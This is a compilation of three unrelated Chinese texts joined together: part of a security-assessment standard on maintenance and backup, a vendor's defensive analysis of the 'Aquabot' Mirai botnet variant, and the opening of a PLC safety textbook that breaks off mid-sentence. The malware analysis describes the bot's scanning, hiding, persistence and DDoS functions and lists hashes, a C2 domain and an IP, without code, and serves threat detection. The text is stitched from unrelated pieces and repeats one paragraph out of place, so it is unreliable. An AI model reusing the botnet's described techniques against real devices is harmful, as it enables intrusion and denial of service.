备(包括备份和冗余设备)的启动/停止、加电/断电等操作行为编制了安全操作规程,并通过访 谈操作人员核查是否能够按操作规程进行操作; b) 通过访谈设备管理员,核查是否按相应安全防护保障要求对含有重要数据的设备带出工作环 境采取加密措施; c) 通过访谈设备管理员,检查含有存储媒体的设备在报废或重用前是否按相应安全防护保障要 求彻底清除或安全覆盖设备上的敏感数据和授权软件。 8 . 10 . 2 配置变更 可采用人员访谈、文档查阅、人工核查等方法。 内容包括: a) 访谈并查阅重大配置变更影响分析报告和安全测试报告; b) 通过访谈运维负责人,核查变更中止或失败后的恢复程序、工作方法和职责是否文档化,恢复 过程是否经过演练; c) 访谈是否进行开展变更恢复并查阅演练记录; d) 核查变更恢复程序是否按相应安全防护保障要求规定变更中止或失败后的恢复流程。 8 . 10 . 3 数据备份与恢复 可采用人员访谈、文档查阅等方法。 内容包括: a) 通过访谈系统管理员和查阅记录表单,检查有是否对需定期备份的业务信息、系统数据及软件 系统进行了识别; b) 通过查阅相关制度,检查是否按相应安全防护保障要求制定了数据备份和恢复的策略、备份程 序和恢复程序等; c) 通过查阅相关制度,检查是否按相应安全防护保障要求明确了备份策略需要包含的内容。 8 . 10 . 4 外包维护 可采用人员访谈、文档查阅、人工核查等方法。 内容包括: a) 通过人员访谈和查阅记录文档,检查是否按相应安全防护保障要求对向维护工具等设备输入 数据和从设备输出数据等操作过程进行行为管控,并对防止数据泄露、被破坏或被篡改丢失的 有效性进行评估; b) 通过查阅相关审批文件和管理制度,检查是否按相应安全防护保障要求对远程维护行为采取 事前进行审批、事中和事后监控措施,并对措施的有效性进行评估; c) 通过人员访谈、人工核查和查阅管理制度等方式,检查是否能够保证操作运维工具过程中保留 不可更改的审计日志以及操作结束后清除工具中的敏感数据。
standards
Mirai僵尸网络变种“Aquabot“分析 1.概述 近期,安天CERT捕获到一个Mirai僵尸网络新变种,针对MIPS、ARM和X86等多种架构,利用弱口令感染目标,并等待控制指令进行DDoS攻击。由于该僵尸网络文件名以“Aqua*”命名,我们将其命名为Aquabot。 经分析,Aquabot僵尸网络至少迭代过2个版本。其中v1以Mirai开源框架为基础开发,主要功能为进程管理、弱口令扫描和DDoS攻击。2023年11月捕获的最新v2样本在v1基础上针对进程管理、隐匿和传播等功能进行迭代,同时增加了检测设备进程启动参数,以防止设备重启、关机和断电从而延长其生存时间的功能。 经验证,安天探海威胁检测系统(简称PTD)能够实现对该僵尸网络C2通信的精准检测。 2.安全建议 随着安全威胁泛化,物联网僵尸网络得到了快速发展,Aquabot僵尸网络基于Mirai开源框架、模块复用和定制化开发完成了多次迭代。由于IoT设备型号各异、存储空间局限、自身安全防护能力有限,难以“外挂”第三方安全产品,并且需要保持长期联网在线运行,对此,安天建议: 1. 加强关口前移,融合原生安全能力 建议IoT设备生产方在规划、研发、生产制造阶段融入安全基因,预先嵌入安天智能安全内核和威胁检测引擎,面向能源、交通、制造等智能场景,形成出厂即具备原生威胁检测和高水平的初始安全基线,持续保障用户的业务安全、稳定运行,进一步提升品牌竞争力和影响力。 2. 强化网络威胁监测与响应 建议IT运营者部署网络威胁检测与响应系统(NTA或NDR)可以结合Aquabot僵尸网络相关信标进行告警。安天探海威胁检测系统集成了恶意代码检测引擎、网络行为检测引擎、威胁情报检测引擎、威胁检测模型、自定义场景检测引擎等,可有效检测网络扫描探测、远程漏洞利用、攻击载荷投放、僵尸网络活动、病毒扩散传播、木马远程控制、web 攻击等行为。 图2-1使用威胁情报库检出威胁行为 图2-2 使用网络行为特征检出威胁行为 图2-3 使用模型检出僵尸网络漏洞扫描行为、弱密码破解用户口令行为 3.3. 加强IoT设备访问控制和运维 建议IT运营者保持系统和固件均升级为最新版本、优化默认安全配置策略、设置合理的访问控制策略、完善远程运维连接的管控和审计等。 建议IT运营者修改设备出厂默认口令并设置安全口令,建议使用16位或更长的密码,包括大小写字母、数字和符号在内的组合,同时保证不同型号的设备使用不同的安全口令,并定期更换口令,避免长时间使用同一口令。 4. 遭受攻击及时应急处置 若出现网络异常堵塞或其它情况,联系安天应急响应团队(CERT@antiy.cn)处置威胁,或拨打安天7*24小时服务热线400-840-9234寻求帮助。若遭受攻击,建议及时隔离被攻击IoT设备或主机,并保护现场等待安全工程师对IoT设备和计算机进行排查。 3.样本分析 本文选取Aquabot X86架构的样本为主要分析对象。Aquabot-v1主体上沿用了Mirai僵尸网络结构框架,主要功能分为初始化、进程管理、弱口令扫描和命令控制四部分。 表3-1 Aquabot-v1样本标签 病毒名称 Trojan/Linux.Mirai.asx 原始文件名 x86 MD5 14C46C7F8F8185793BEF4F919C24DC05 文件大小 41.55 KB (42544 bytes) 文件格式 BinExecute/Linux.ELF VT首次上传时间 2023-09-16 18:32 VT检测结果 42/63 3.1 初始化 样本运行后修改进程名为“configd”,并在控制台上输出内容“silly man infected”。 通过检测watchdog传统路径,阻止其对设备进行重启和关机等操作。 采用异或算法解密运行所需字符串,算法和密钥数组如下图所示。 3.2 进程管理 通过复用Mirai源码中“killer_kill_by_port”函数,实现对受感染设备的进程管理。扫描“/proc/net/tcp”文件过滤特定端口,关闭对应进程,并通过“bind”占用端口。过滤端口如下。 序号 过滤端口号 端口用途 23 23端口是Telnet的端口。Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。 80 80端口是为HTTP(HyperText Transport Protocol)即超文本传输协议开放的,主要用于WWW(World Wide Web)万维网传输信息的协议。 81 Web服务器的替代端口。 88端口是针对Kerberos身份验证系统而开放的。Kerberos是一种安全的身份验证系统,可确保计算机系统中的用户和应用程序可以安全访问网络上的资源。 10023 无默认服务。 39148 无默认服务。 60568 无默认服务。 39200 无默认服务。 样本利用“readdir”函数遍历并对比“/proc”下进程名,通过“/proc/pid/cmdline”获取进程文件描述符并逐字节比对,当进程名满足“由数字、大小写字母组成,长度≥6,数字的数量≥2”时对比成功,结束相关进程。在Mirai源码中此功能是用于结束其他僵尸网络进程。 3.3 弱口令扫描 样本通过生成随机的TCP源端口、配置IPv4头和配置TCP头,初始化弱口令扫描模块。 而后通过如下算法生成随机IP地址,随机选择弱口令字典中的用户名密码组合,对该IP地址进行Telnet登录测试。 弱口令字典数量为46组,使用异或0x22加密存储,解密后的弱口令字典如下图所示。 当登录成功时,将IP地址、用户名和密码等信息上报C2服务器。 样本利用“readdir”函数遍历并对比“/proc”下进程名,通过“/proc/pid/cmdline”获取进程文件描述符并逐字节比对,当进程名满足“由数字、大小写字母组成,长度≥6,数字的数量≥2”时对比成功,结束相关进程。在Mirai源码中此功能是用于结束其他僵尸网络进程。 若攻击者下发了DDoS攻击指令,则会对指定目标发起DDoS攻击。 样本共集成udp、tcp、gre和app等类型的DDoS攻击,部分类型功能情况如下。 攻击方法名称 功能 udp_generic 向目标系统发送大量的UDP数据包来超载其网络资源。 udp_vse 查询洪水攻击,通过发送大量查询请求来超载服务器资源。 tcp_syn 半开连接攻击,耗尽服务器资源。 tcp_ack 在tcp连接建立之后,发送带有ack标志位的数据包。 tcp_stomp ack flood 攻击变体。 gre_ip 修改的greeth flood。 gre_eth 基于GRE协议的洪水攻击。 udp_plain udp flood攻击变体。 app_http 向目标服务器发送大量的HTTP请求,消耗服务器资源。 4.样本迭代对比 经分析,Aquabot僵尸网络至少迭代过2个版本。v2在v1基础上改动,2023年11月份捕获的最新v2样本主要针对传播、隐匿、持久化和进程管理等功能进行迭代。 表 4-1 Aquabot-v2样本标签 病毒名称 Trojan/Linux.Mirai.asx 原始文件名 Aqua.x86 MD5 8aea7da471d61d2aaa8fb81172f85fdb 文件大小 61.30 KB (62772 bytes) 文件格式 BinExecute/Linux.ELF VT首次上传时间 2023-11-08 06:57 VT检测结果 38/63 v2版本使用硬编码域名作为上线地址,根据域名创建时间推测,最初迭代时间为2023年9月25日。 图4-1 v2迭代时间 迭代内容主要为: (1) 传播能力:v2版本移除弱口令扫描功能。 (2) 隐匿能力:v2版本会修改进程名为“httpd”,增加删除“/proc/self”文件实现隐匿进程的功能。 图4-2 进程隐匿对比 (3) 持久化能力:v2版本移除了安全狗重启检测功能;增加检测进程启动参数,阻止对设备进行重启、关机和断电等操作。 图4-3 持久化实现方式对比 (4) 进程管理能力:v2版本移除通过“/proc/net/tcp”过滤特定端口关闭进程功能;增加通过“/proc/%d/maps”“/proc/%d/exe”“/proc/%d/stat”“/proc/%d/cmdline”等方式过滤并关闭“/tmp”“/var/run”“/mnt”“/root”目录下,进程符号链接中不包含“sh”“ps”的进程。 图4-4 进程管理对比 Aquabot僵尸网络迭代对比如下。 表 4-2 Aquabot僵尸网络迭代对比 Aquabot-v1 X86 Aquabot-v2 X86 进程隐匿 修改进程名为“configd”。 修改进程名为“httpd”、删除“self”文件。 控制台输出 “silly man infected” “about to cum inside a femboy btw” 反调试 反GDB调试。 反GDB调试。 解密算法 ^=(异或)。 ^=(异或)。 密钥 上线 复用mirai上线代码,使用IP作为上线地址。 复用mirai上线代码,优先使用域名作为上线地址。 持久化 检测watchdog传统路径,阻止其对设备进行重启和关机等操作。 检测进程启动参数,阻止其对设备进行重启、关机和断电等操作。 命令与控制 共集成udp、tcp、gre和app等类型的DDoS攻击。 共集成udp、tcp、gre和app等类型的DDoS攻击。 进程管理 通过“/proc/net/tcp”过滤39148、10023、23、81、80、88、60568、39200端口的方式关闭进程并通过“bind”占用端口。 通过“/proc/pid/cmdline”获取进程文件描述符并逐字节比对,当满足“由数字和大小写字母组成、长度≥6、数字的数量≥2”时,关闭该进程。在Mirai源码中此功能是用于结束其他僵尸网络进程。 通过“/proc/%d/maps”“/proc/%d/exe”“/proc/%d/stat”“/proc/%d/cmdline”等方式过滤并关闭“/tmp”“/var/run”“/mnt”“/root”目录下,进程符号链接中不包含“sh”“ps”的进程。 弱口令扫描 配置网络信息使用弱口令字典扫描随机IP地址(弱口令字典使用异或0x22加密存储),当弱口令登陆成功则将IP地址、用户名和密码等信息上报C2服务器。 移除该模块。 5.样本对应的ATT&CK映射图谱 Aquabot僵尸网络X86架构样本行为技术点的ATT&CK框架图谱如下所示: 图5-1 技术特点对应ATT&CK的映射 Aquabot僵尸网络X86架构样本涉及ATT&CK框架中9个阶段的11个技术点,具体ATT&CK技术行为描述表: 表 5-1 ATT&CK技术行为描述表 ATT&CK阶段/类别 具体行为 注释 侦察 主动扫描 生成随机IP地址,并对该IP地址实施扫描。 资源开发 获取基础设施 使用弱口令漏洞获取基础设施,构建僵尸网络。 初始访问 利用有效账户 使用弱口令字典对随机IP地址的设备尝试登陆,成功则上报IP地址、用户名和密码等信息,用于投递后续载荷。 持久化 电源设置 检测安全狗或进程启动参数,阻止其对设备进行重启、关机和断电等操作。 防御规避 混淆文件或信息 采用异或算法解密运行所需字符串和弱口令字典。 隐藏行为 修改进程名,删除“self”文件隐匿进程。 凭证访问 暴力破解 使用弱口令字典尝试登陆。 发现 发现进程 过滤并关闭特定端口的进程、过滤并关闭特定目录下特定进程。 发现远程系统 以发现远程基础设施为目标,对随机IP地址扫描。 命令与控制 使用应用层协议 使用web协议传输远控指令。 影响 网络侧拒绝服务 发起udp_generic、tcp_syn和udp_vse等DDoS攻击。 6.IoCs IoCs 5E4539E71DB8A8D5AAB7B417B12C3A11 EDA6C9945F449A1FFE07A09096FAC532 DBB63B126B96D69B4E974B0C4D8ABF19 C4973FD941C001EFCE069EA8952A9C42 A4F59DA4725333E671B7257F8C7D5146 A06B5BE74AF6D4A8BB534DCE0E4D8960 8FFD26C19F4890863D0F969D04F38F5B 8AEA7DA471D61D2AAA8FB81172F85FDB 6FCF2A40B1463B118E38F0802B54E003 6C9B401F6FB9D1D3BD4DCFD93B45F0F8 61DE0F87AEEE052D05C74024C974F393 5F47FB7E60D05ED2A90319F21742E4E4 5F1C6B75883C1315FD8ADF0A1B90F1D8 412CA37E49E4477F45BFB5E45268B862 1C2940D4F116A329147FC80C590B8817 14C46C7F8F8185793BEF4F919C24DC05 Boats.dogmuncher.xyz 89.190.156.145
standards
PLC与工控系统安全自动化技术及应用 随着 PLC(可编程控制器) 产品的不断更新(例如具有网络通信功能的 PLC系统) 和 功能的不断提高, 各种类型 、不同功能和规模的 PLC控制系统在各个领域得到了更为广泛 的应用 。PLC技术与 PLC控制系统在工业生产和民用工程自动化应用中占重要地位 。进入 21世纪以来, 随着工业自动化技术的高速发展 , 控制系统的自动化程度越来越高 , 规模越 来越大, 系统复杂性也越来越强; 在系统互连的情况下, 单个单元的故障可能引起全系统瘫 痪 。原来系统安全依靠操作人员的安全操作和故障的迅速排除, 逐渐改变为依靠安全自动化 系统提供安全保障, 对应工控系统的安全自动化技术应运而生 。 在IEC61508国际标准中, 给安全做了如下的定义: 安全是不存在不可以接受的风险 。安全问题转化为风险问题, 如此 一来 ,安全就是可以控制的了 , 因为风险是可控的 。 PLC的产品众多 、应用范围广泛 , PLC控制系统结构复杂, 对于从事控制系统开发 、 应用和维护的工程技术人员来说, PLC控制系统的安全性越来越重要了 。 为了帮助现场工 程师和技术人员进一步掌握 PLC与工控系统安全自动化技术, 我们编写了此书 。 全书分为 6章, 第1章介绍 PLC的基础知识; 第 2章分别以欧姆龙和西门子系列 PLC为例, 介绍 PLC的编程方法与实例 ;第3章介绍 PLC自动化技术与工控系统 ;第4章介绍 PLC控制系 统的安全性 ;第5章介绍 PLC控制系统的功能安全实现 ;第 6章介绍 PLC自动化安全系统 应用实例 。 在本书的编写过程中 ,黄之炯 、赵铮也参与了部分工作 ,在此表示感谢 ;对提供资料的 单位和个人表示感谢 。 由于编者水平有限, 时间仓促 ,不足之处在所难免, 恳请读者批评指正 。 编 者 2011年1月 PLC 的 基 础 知 识 PLC(Programmable Logic Controller, 可编程控制器) 技术与 PLC控制系统在工业生 产与民用工程自动化应用中占支配地位 。 随着 PLC产品不断更新和功能不断提高 , 各种类 型 、不同功能和大小规模的 PLC控制系统在各个领域得到了更广泛的应用 。进入 21世纪以 来 ,几乎所有的工业产品都离不开自动化技术 。在我们生活的各个方面也越来越与自动化联 系在一起 。 随着可编程控制技术大量应用 , PLC与 PLC系统越来越重要 。例如 , 在运动控 制过程中无论是选择哪些变量进行监控 , 都可以采用光电 PLC控制系统来实现 。 由于可编 程控制器具有数字控制 、 网络通信和抗干扰能力强的优点 , 使得 PLC控制技术成为大小控 制系统的核心部件 。PLC在航空航天工程 、能源工程 、机器人系统 、生产流水线 、机器制 造 、交通车辆控制 、工程测量系统 、安全监控系统 、环境工程中起着实时控制 、测量转换 、 采集数据传输和网络信息处理等功能 。 因此 , PLC的正常可靠工作对工业生产和居民生活 至关重要 。 1.1 PLC 的 基 本 原 理 1.1.1 概述 1.1.1.1 PLC的定义 PLC是以嵌入式微处理器为核心 ,具有数字逻辑或模拟输入/输出模块 , 专为适用工业 和工程复杂环境而设计的数字控制装置 。经过长期的实际应用 , 它已经成为技术通用和标准 化的控制器 ,是综合了微计算机技术 、 自动化技术和网络通信技术的新一代工业产品 。PLC 采用了专门设计的模块化硬件结构 ,其控制功能通过执行控制程序来完成 ,具有高可靠性以 及适应工业现场的高温 、高湿度 、冲击和振动等恶劣环境的特点 ,是机械制造控制 、化工过 程控制和能源工程控制等工业控制应用最普遍使用的工具 ,在工业自动化和民用与环境工程 领域得到了广泛的应用 。 随着可编程控制器的发展 , 它不仅能完成编辑 、逻辑控制和数字通 信功能 , 而且能实现模拟量与数字量的相互转换 。 可编程控制器不但具有存储程序的存储 器 ,还在内部对数据进行存储 。它可执行逻辑运算 、顺序控制 、定时 、记数和算术操作的指 令 ,通过数字量或模拟量的输入输出来控制各种类型的机械设备或生产过程; 还具有液晶显 示功能 ,通过触摸屏可实现人机对话 ,设定控制系统的参数和状态 。可编程控制器之所以有 生命力 ,在于它更适合工业现场和市场的要求 ,具有高可靠性 、强抗干扰能力 、编程安装使 用简便 、低价格长寿命等优点 。可编程控制器可采用特有的编程语言 ——— 梯形图 , 当使用它 进行编程时 ,可以直接应用继电器逻辑电路的设计 , 而不必进行计算机方面的专门培训 。 可编程控制器具有丰富的输入/输出接口 ,并且具有较强的驱动能力 。 在实际应用时 , 可编程 控制器系统硬件可根据实际需要选择不同的配置模块 ,其软件根据控制要求进行设计编制, 因此编程控制器可以在恶劣环境中完成各种各样复杂程度不同的工业生产实时控制任务与工 程现场的数据采集处理和通信任务 。 1.1.1.2 PLC的工作过程 PLC的基本工作原理是采用程序扫描技术来实现逻辑控制功能 。 扫描是一种形象化的 术语 ,用来描述可编程序控制器内部的 CPU的工作过程 。所谓扫描就是依次对各种规定的 操作项目全部进行访问和处理 。PLC运行时 , 用户程序中有众多的操作需要执行 , 但是 一 个 CPU每一个时刻只能执行一个操作而不能同时执行多个操作 , 因此 CPU按程序的顺序依 次执行各个操作 。这种在处理多个作业时依次按顺序处理的工作方式称为扫描工作方式 。 由 于扫描是周而复始无限循环的 , 每扫描一个循环所用的时间为扫描周期 。顺序扫描的工作方 式是 PLC的基本工作方式 , 它简单直观 ,方便用户程序设计 , 为 PLC的可靠运行提供了有 利保证 。一方面 ,所扫描的指令被执行后其结果马上就可以被后面将要扫描的指令所利用; 另一方面 ,还可以通过 CPU设置定时器来监视每次扫描时间是否超过规定时间 , 避免由于 CPU内部故障使程序执行进入死循环 。 PLC的工作过程基本上是用户的梯形图程序的执行过程 , 即在系统软件的控制下顺次 扫描各输入点的状态 ,按用户程序解算控制逻辑 ,然后顺序向各个输出点发出相应的控制信 号 。 除此之外 , 为提高工作的可靠性和及时地接收外来的控制命令 , 每个扫描周期还要进行 故障自诊断和处理 ,处理与编程器或计算机的通信请求 。 因此 , PLC工作过程分为以下 5 个步骤: (1) 自诊断 。 自诊断功能可使 PLC系统防患于未然 , 而在发生故障时能尽快地修复 , 为此 PLC每次 扫描用户程序以前都对 CPU、存储器 、输入/输出模块等进行故障诊断 ,若自诊断正常便继 续进行扫描 , 而一旦发现故障或异常现象则转入处理程序 ,保留现行工作状态 ,关闭全部输 出 ,然后停机并显示出错的信息 。 (2) 网络通信 。 自诊断正常后 PLC即扫描编程器 、上位机等通信接口 , 如有通信请求便响应处理 。 在 与编程器通信过程中 , 编程器把指令和修改参数发送给主机 , 主机把要显示的状态 、数据 、 错误码进行相应指示 , 编程器还可以向主机发送运行 、停止 、清内存等监控命令 。在与上位 机通信过程中 PLC将接收上位机发出的指令进行相应的操作 , 把现场状态 、PLC的内部工 作状态 、各种数值参数发送给上位机 ,并执行启动 、停机 、修改参数等命令 。 (3) 输入现场状态 。 完成前两步工作后 PLC便扫描各个输入点 ,读入各点的状态和数据 , 如开关的通断状 态 、形成现场的内存映像 。这一过程也称为输入采样或输入刷新 。在一个扫描周期内 , 内存 映像的内容不变 。 即使外部实际开关状态已经发生了变化 ,也只能在下一个扫描过程中的输 入采样时刻进行刷新 ,解算用户逻辑所用的输入值是该输入值的内存映像值 , 而不是当时现 场的实际值 。 (4) 解算用户逻辑 。 解算用户逻辑即执行用户程序 。一般是从存储器的最低地址存放的第一条程序开始 , 在无跳转的情况下按存储器地址的递增方向顺序地扫描用户程序 ,按用户程序进行逻辑判断和 算术运算 , 因此称之为解算用户逻辑 。解算过程中所用的计数器/定时器 、 内部继电器等编 程元件内数据为相应存储单元的即时值 , 而输入继电器/输出继电器则用的是内存映像值 。 在一个扫描周期内 ,某个输入信号的状态不管外部实际情况是否已经变化 ,对整个用户程序是一致的 ,不会造成结果混乱 。 (5) 输出结果 。 将本次的扫描过程中解算最新结果送到输出模块取代前 一次扫描解算的结果 , 也称为输出刷新 。解算用户逻辑时, 每一步所得到的输出信号被存入输出信号寄存表并未发送到 输出模块 ,相当于输出信号被输出门阻隔 , 待全部解算完成 后打开输出门并输出 ,所用输出信号由输出状态表送到输出 模块 ,其相应开关动作 。 在依次完成上述 5个步骤操作后, PLC又开始进行下一次扫描 。如此不断的反复循环扫描 , 实 现对全过程及设备的连续控制 , 直至接收到停止命令 、或停 电 、 出现故障为止 。PLC的扫描工作的过程如图1-1所示 。 1.1.2 PLC技术的发展 随着 PLC技术与应用的快速发展 , PLC已成为控制应 用中心 ,数据采集中心 、人机交互处理中心 、数据通信处理中心 、信号变换处理中心和网络控制中心 。可编程控制器 (PLC) 具有非常好的应用前景, 在中国自动化部分领域的年增长率已经超过 20% 。尽管价格在降低 , 中国的 PLC市场仍预 期在今后5年将以14.1%的复合增长率(CAGR) 增长 。美国 ARC咨询机构一项研究结果 表明 ,2003年这个市场大约是3亿7千万美元 ,并且到 2008年翻一番 。 中国国民经济发展 的众多因素正在驱动中国 PLC市场的增长 。例如 , 三峡和黄河的电力工程将使应用 PLC的 制造业缓解面临的电力饥荒; 在中国建立生产基地的多国公司外购趋势也促进了 PLC自动 化产品的应用; 随着老产品的升级改造 ,现在国有企业需要更高的 PLC自动化程度 , 以便 在出口市场的激烈竞争中取胜; 急速发展的中国机床市场将持续需要更多的 PLC, 进行 PLC工程教育的浪潮和以出口为目标的中国公司采用的最新 PLC控制技术 ,都将使 PLC得 到更加广泛而深入的应用和发展 。 (1) PLC的发展过程 。 PLC的发展过程大致可分3个阶段 。 1) 第一代 PLC(20世纪60年代末 ~70年代中期)。 早期的 PLC作为继电器控制系统 的替代物 ,其主要功能只是执行原先由继电器完成的顺序控制和定时/计数控制等任务 。 PLC在硬件上以微计算机的形式出现 ,在输入/输出接口电路上作了改进 , 以适应工业控制 现场的要求 。装置中的器件主要来分立元件和中小规模集成电路 ,存储器采用磁芯存储器 。 另外还采取了一些措施 , 以提高其抗干扰的能力 。PLC在软件上吸取了广大电气工程技术人 员所熟悉的继电器控制线路特点 ,形成了特有的编程语言一梯形图(Ladder Diagram), 并一直 沿用至今 。其优点是简单易懂 ,便于安装 ,体积小 ,能耗低 ,有故障指示 ,能重复使用等 。 2) 第二代 PLC(20世纪70年代中期 ~80年代后期)。 20世纪70年代 ,微处理器的出 现使 PLC发生了巨大的变化 。各个 PLC厂商先后开始用微处理器作为 PLC的中央处理单元(Central Processing Unit, CPU), 使 PLC的功能大增强 。在软件万面 , 除了原有功能 外 ,还增加了算术运算 、数据传送和处理 、通信 、 自诊断等功能 。在硬件方面 , 除了原有的 开关量I/O以外 , 还增加模拟量 I/O、远程 UO和各种特殊功能模块 , 如高速计数模块 、 PID模块 、定位控制模块通信模块等 。 同时扩大了存储器容量和各类继电器的数量 ,并提供 一定数量的数据寄存 ,进一步增强了 PLC的功能 。 3) 第三代 PLC(20世纪80年代后期至今)。 20世纪 80年代后期 , 随着超大规模集成 电路技术的迅速发展 ,微处理器的价格大幅下降 , 各种 PLC采用的微处理器的性能普遍提 高 。为了进一步提高 PLC的处理速度 ,制造厂家还开发了专用芯片 , PLC的软件和硬件功 能发生了巨大变化 ,体积更小 , 成本低 , I/O模块更丰富 , 处理速度更快 , 指令功能更强 。 即使是小型 PLC,其功能也大大加强 ,在有些方面甚至超过了早期大型 PLC的功能 。 (2) PLC的发展方向 。 随着相关技术特别是超大规模集成电路技术的迅速发展及其在 PLC中的广泛应用, PLC中采用更高性能的微处理器作为 CPU , 功能进一步增强 , 逐步缩小了与工业控制计算 之间的差距 。 同时I/O模块更丰富 , 网络功能进一步增强 , 以满足工业控制的实际需要 。 程序语 言 除 了 梯 形 图 外 , 还 可 采 用 指 令 表 、 顺 序 功 能 图 (Sequential Function Charter, SFC) 高级语言(如 BASIC和 C语言) 等 。另外还普遍采用表面安装技术 , 不仅降低成本, 减小体积 , 而且进一步提高子系统性能 。 现代 PLC的发展有两个主要趋势: ①向体积更小 、速度更快 、功能更强的微小型方面 发展; ②向大型网络化 、高可靠性 、 良好的兼容性和多功能方面发展 ,相当于当前工业控制 计算机(工控机) 的性能 。 大中型 PLC主要是朝 DCS(Distributed Control System ,分布式控制系统) 方向发展, 使 PLC具有 DCS系统的一些功能 。 网络化和通信能力强是 PLC发展的一个重要方面 , 对 特定 、标准的现场总线的支持则是必然的趋势 。 向下可将多个 PLC、IS0框架相连 , 向上与 工控 、工业以太网 、MAP网等相连 ,构成整个工厂的自动化控制系统 , 真正实现管控一体 化 。步进电机控制 、位置控制 、伺服控制等模块的出现 ,使得 PLC的应用领域更加广泛 。 例如西门子(SIEMENS) 公司的 S7-200、S7-300和 S7-400系列 PLC都支持现场总线 标准 Profibus, 并具有全面的故障诊断功能 。模块式结构可用于各种功能的扩展 , 快速的指 令处理大大缩短了扫描周期 ,并采用了高速计数器 。 高速中断处理可以分别响应过程事件, 大幅度降低了成本 。 由于控制系统的可靠性日益受到人们的重视 ,一些公司已将自诊断技术 、冗余技术 、容 错技术广泛应用到新产品中 ,推出了高可靠性的冗余系统 ,并采用双机热备 、并行工作或多 数表决的工作方式 。S7-400系列 PLC即使在恶劣的工作环境下 , 坚固 、全密封的模板依然 可正常工作 ,在系统运行过程中还支持模板的热插拔 。 总之 ,PLC的发展主要趋向于大型化和小型化的两极 , 具体体现在标准化 、模块化 、 网络化 、低价格 、高性能等方面 。但 PLC长期以来走的是专门化的道路 , 使其在获得成功 的同时也带来了一些不便 , 主要表现在软件和硬件的互不兼容 ,从而妨碍了自身的发展 。 因 此 ,实现 PLC硬件和软件的标准化则是以后发展的必然趋势 。从 1978年起 , IEC在其下设 TC65的 SC65B中专设 WGT工作组 ,着手制定 PLC的国际标准 。我国也于 1992年成立了 PLC委员会 ,着手制定 PLC的国家标准 。 目前IEC已经制定和公布的标准有以下5种: IEC1131— 1General Information(一般信息) IEC1131— 2Equipment Charactristics and TestRequirement(设备特性与测试要求) IEC1131— 3Programming Language(编程语言) IEC1131— 4User Guidelines(用户指南) IEC1131— 5MMS Companion Standard(制造信息规范伴随标准) 遗憾的是 ,直到今天 ,PLC在兼容性方面基本上还是原地踏步 , 硬件资源配置和指令 系统仍然是各自为政 , 除了网络通信方面以外几乎没有什么进展 。 如果 PLC能够真正实现 标准化 ,则必将大大促进其自身的应用和发展 。 1.2 PLC 的 系 统 应 用 1.2.1 PLC的结构与分类 1.2.1.1 PLC的结构 PLC是模块化结构的控制系统 , 模块化的主要目的是为了适应环境变化的生产过程 。 它具有抗电磁干扰 、温度和湿度变化以及标准化功能 , 便于使用与维护 。PLC还可以根据 应用功能的需要选择不同的功能模块组合成系统 , 例如使用电源模块 、CPU模块 、通信模 块 、I/O接口和模数转换模块等 。控制器的模块并列安装在导轨上 , 导轨和模块都符合相应 的工业标准 。一种 ControlLogix PLC外形如图1-2所示 。 图 1-2 ControlLogix PLC外形 虽然 PLC一般是模块化的结构 ,但在某种应用场合 , 有一体化的微型 PLC存在 , 例如 NorthEastern Ohio有限公司的微型 PLC,如图1-3所示 。 1.2.1.2 PLC的分类 PLC 一般分为小型 PLC、 中型 PLC和大型 PLC。I/O点数表明 PLC可以从外部接收多少输入量和向外部输出多少个输出量 , 即 PLC的 I/O端 子数 。一般来说 ,点数多的 PLC功能较强 。I/O点总数在 256点以下的 PLC称为小型 PLC。小型 PLC体积小 , 结 构紧凑 ,整个硬件融为一体 ,是实现机电一体化的理想控 制器 ,也是一种在实际控制中应用得最为广泛的机型 。小 型 PLC一般就 CPU 速度 、存储器规模 、输入输出节点 数 、 内部定时器/计数器个数 、编程指令都比中大型 PLC 少得多 ,一般用来实现条件控制 、定时/计数控制 、顺序 控制等功能 。新一代的小型 PLC都具有算术运算 、 浮点数运算 、 函数运算和模拟量处理的功能 ,可满足更为广泛的需要 。I/O点数在 256~1024点 之间的 PLC为中型 PLC。 中型 PLC在逻辑运算功能的基础上增加了模拟量处理 、算术运 算 、数据传送 、数据通信等功能 , 可完成既有开关量又有模拟量的复杂控制 。 中型 PLC的 编程器有便携式和带有 CRT/LCD的智能图形编程器供用户选择 。后者为用户提供了更直观 的编程工具 ,梯形图能直接显示在屏幕上 。用户可以在屏幕上直观地了解用户程序运行中的 各种状态信息 ,方便用户编写和调试程序 ,提供了良好的监控环境 。 I/O点数在2048点以上的 PLC为大型 PLC。 大型 PLC具有极强的软件和硬件功能 、 自诊断功能 、通信联网功能 , 它可以构成二级通信网 ,实现工厂生产管理自动化 。另外大型 PLC还可以采用一个 CPU 构成表决式系统 , 使机器具有更高的可靠性 。 如西门子公司的 S7-400系列 PLC、三菱公司的 A3M 、A3N系列 PLC都属于大型机 。 I/O点数是大家以往常常引用的 、用来衡量 PLC规模大小的传统方法 , I/O点标准见 表1-1。 表 1-1 I/O点新旧标准对照 新标准 旧标准 更早标准 Nano型: 少于 15个I/O点 Nano型: 少于 15个I/O点 Nano型: 0~64个I/O点 微型: 16~255个I/O点 微型: 16~128个I/O点 微型: 65~128个I/O点 中型: 256~1024个I/O点 中型: 129~511个I/O点 中型: 129~256个I/O点 大型: 2048或更多I/O点 大型: 512或更多的I/O点 大型: 256或更多的I/O点 然而 ,现在最小型 PLC的I/O处理能力 ,也超过了过去大型 PLC的处理能力 。所以专 家认为现在的 PLC最好是以提供所需的功能而不是I/O点数来衡量 PLC的规模大小 。 现在 一般微型 PLC控制盘的安装空间非常有限 , 却需要适用于高产量生产线和高处理速度的操 作环境 。 由于它的一体化的外形结构 ,这种紧凑型的 PLC可以提供多达64个点的I/O处理 能力 ,并且可以扩展到176个点 。快速的系统扫描周期 , 固件的编程指令集 ,可使编程选项 倍增的扩展内存 ,模块化的设计使得系统的硬件安装更灵活 、更容易 。一种带有液晶显示功 能的小型 PLC如图1-4所示 。 PLC专家建议用户根据具体的应用场合来决定采用何种 PLC。今天的控制处理过程很大程度上依赖包罗万象的信号和数据 , 其涵盖的范围包 括模拟及数字输入/输出设备 、高分辨率高速的摄像机, 以及多轴运动控制器 。很多应用场合 , 比如高速生产线 、 实时的机械状态监测 、高精度控制 , 以及复杂过程控制, 他们往往需要在确定的时间间隔内 , 执行完成高速的数 据采集 、先进的数据分析以及处理算法任务 。 高级的 PLC可以满足上述部分要求 。然而 , 工程师 为了能够高效地处理这些信号 , 需要一些进行计算的资 源 ,如浮点处理器及足够的内存 。也可以利用其他设备 构成 